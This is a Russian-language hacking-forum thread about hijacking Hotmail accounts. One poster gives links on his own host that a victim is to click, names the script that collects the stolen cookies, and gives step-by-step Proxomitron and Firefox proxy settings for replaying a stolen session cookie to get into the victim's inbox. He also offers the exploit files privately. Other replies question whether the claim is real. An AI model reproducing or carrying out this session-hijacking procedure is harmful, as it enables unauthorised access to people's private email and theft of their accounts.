ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Чесно говоря ниче не понял!
При нажатие на какой линк у жертвы уплывают куки???
про XSS здесь ниче не написано!
Можно чуть по поподробней про сам угон куков!

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс

нажав на линк одной из этих ссылок:
http://devarsiv.org/picture5.jpg
http://devarsiv.org/a.gif
http://www.devarsiv.org/a.txt
__________________________________________________ ___

куки уплывут на адрес: www.devarsiv.org/alex/alex.php
подменяете куки в проксометроне.
a в браузере Mozila Firefox пройдя по этой ссылке:
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
и вы в инбоксе

100% рабочая бага
раньше срабатывала и на яхо, но на яхо багу недавно закрыли

Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes

Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить

статья моя сам написал, не откуда не выдёргивал.
объясню ещё раз, бага рабочая работает без проблем.
эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл
после нажатия на ссылку жертва попадет к себе-же в календарь
сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php
далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку
In = TRUE
Out = TRUE
Key = "cookie:hott"
Match = "*"
Replace = ""
и меж кавычек в Replace = " here" вставляем куки
попaдём мы в инбокс только через Mozila Firefox
изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080
после запустим сам проскометрон он должен будет ждать соединения на 8080 порту
в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки
если не разберётесь стучите в асиу
удачи!!

сам сплойт у меня на хосте выполнит скрипт, вам нужно,
чтоб жертва просто прошла по одной любой из этих ссылок:
http://devarsiv.org/a.gif
http://devarsiv.org/picture5.jpg
http://www.devarsiv.org/a.txt
а на этот адрес: www.devarsiv.org/alex/alex.php придут куки

кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом
сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php

Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать)))))))